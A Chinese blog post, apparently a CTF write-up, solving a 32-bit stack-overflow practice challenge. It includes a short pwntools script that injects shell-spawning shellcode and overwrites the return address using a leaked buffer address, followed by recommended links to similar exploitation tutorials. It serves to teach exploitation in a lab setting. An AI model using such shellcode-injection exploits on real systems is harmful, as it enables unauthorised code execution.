pwn栈溢出基础练习题——2

最新推荐文章于 2024-05-23 08:02:25 发布
最新推荐文章于 2024-05-23 08:02:25 发布
阅读量384 收藏
点赞数
分类专栏: PWN CTF训练 文章标签: PWN linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41696518/article/details/125646745
版权

题目地址:请看pwn栈溢出基础练习题——1 ;放了本博客的所有练习题目
pwn1
先checksec看下,发现什么保护都没开,爽歪歪
将level1导入ida,发现buf里ebp只有0x88,但却可写入0x100,明显存在栈溢出
在这里插入图片描述
并发现并不存在直接的后门函数,由于这题关掉了栈不可执行,则可以自己构造shellcode
思路直接往buf中存入shellcode,然后通过溢出操作执行这段shellcode即可
先动态调试看看溢出空间
在这里插入图片描述
则构造shellcode和垃圾数据为136+4=140字节空间,返回地址就为buf地址,由于开启了ASLR,buf地址会变动,但程序中直接给我们打印了buf的地址,非常Nice!!
编写exp.py

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

shellcode = asm(shellcraft.sh())
io = process('./level1')
text = io.recvline()[14: -2]

buf_addr = int(text, 16)

payload = shellcode + b'\x90' * (140 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()

\x90:相当于空指令,即使执行到此命令也不会报错,适合填充垃圾字符时使用

python安装pwn_Linux pwn入门教程(0)——环境配置
weixin_34413579的博客
02-10 951
作者:Tangerine@SAINTSEC0x00前言作为一个毕业一年多的辣鸡CTF选手,一直苦于pwn题目的入门难,入了门更难的问题。本来网上关于pwn的资料就比较零散,而且经常会碰到师傅们堪比解题过程略的writeup和没有注释,存在大量硬编码偏移的脚本,还有练习题目难找,调试环境难搭建,GDB没有IDA好操作等等问题。作为一个老萌新(雾),决定依据Atum师傅在i春秋上的pwn入门课程中的技...
攻防世界PWN新手练习区——cgpwn2
smsyz2019的博客
09-23 394
攻防世界PWN新手练习区——cgpwn2 首先检查文件的有哪些保护 checksec cgpwn2 32位程序 用IDA反编译文件 main函数中只有hello函数,点击查看
一道pwn入门的练习题
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn栈溢出基础练习题——1
qq_41696518的博客
07-06 511
pwn练习题
pwn入门之栈溢出练习
dfdhxb995397的博客
09-10 996
本文原创作者:W1ngs,本文属i春秋原创奖励计划,未经许可禁止转载!前言:最近在入门pwn栈溢出,做了一下jarvisoj里的一些ctf pwn题,感觉质量都很不错,难度循序渐进,把自己做题的思路和心得记录了一下,希望能给入门pwn的朋友带来点帮助和启发,大牛轻喷题目链接:https://www.jarvisoj.com/challenges1、level0(64位)代码<ig...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
第一个PWN 栈溢出简单题
qq_41696518的博客
06-16 1381
第一个pwn 栈溢出简单题
掌握pwn技术栈溢出技巧的10道练习题及解答
标题中提到的“pwn栈溢出10道练习题有writeup”,指的是信息安全领域中一种常见的攻击技巧——栈溢出(stack overflow),在此类题目中,练习者通常需要掌握如何利用栈溢出来实现对程序的控制,以解决相关的CTF...
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7725
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
Linux pwn入门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2386
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
PWN测试题目
07-18
信息安全PWN测试题目:用于CTF的练习与PWN的学习,测试题目
简单的练手栈溢出pwn100-附件资源
03-02
简单的练手栈溢出pwn100-附件资源
linux系统的基础知识(一些常见命令,一道pwn栈溢出题目
最新发布
2302_80935968的博客
05-23 1011
linux系统中一切皆文件。
第一道pwn栈溢出
小白垃圾笔记2
03-03 991
代码和解题思路来自启明星辰的《ctf安全竞赛入门》,当然还有好多热心的师傅们的指导。
pwn练习题
WuMing_Z的博客
02-23 2377
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
pwn学习总结(三) —— 栈溢出经典题型整理
lzyddf的博客
11-19 3445
pwn学习总结(五) —— 经典题目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 题目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
pwn刷题num23----栈溢出
tbsqigongzi的博客
04-26 195
BUUCTF-PWN-jarvisoj_level0 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 未开启RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下 程序首先用write函数输出了一个Hello,World,又调用了一个函数 明显的栈溢出,buf占0x80字节,而read函数要读取0x200字节,可以覆盖返回地址
栈溢出基础练习题——5(字符串漏洞)
qq_41696518的博客
07-11 280
pwn 字符串漏洞练习题
栈溢出基础练习题——3 (内有32和64位区别的对比)
qq_41696518的博客
07-07 373
pwn练习题-level2
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值